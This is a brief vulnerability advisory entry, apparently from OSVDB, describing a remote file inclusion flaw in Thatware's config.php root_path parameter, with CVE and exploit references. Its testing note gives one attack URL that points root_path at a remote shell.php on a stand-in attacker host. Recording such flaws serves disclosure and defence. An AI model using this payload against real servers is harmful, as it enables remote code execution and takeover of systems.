Thatware config.php root_path Variable Remote File Inclusion

2006-08-10T23:03:43
ID OSVDB:29481
Type osvdb
Reporter OSVDB
Modified 2006-08-10T23:03:43

Description

Manual Testing Notes

http://[target]/dir_thatware/config.php?root_path=http://[attacker]/shell.php'

References:

ISS X-Force ID: 28313 Generic Exploit URL: http://www.milw0rm.com/exploits/2166 FrSIRT Advisory: ADV-2006-3257 CVE-2006-4213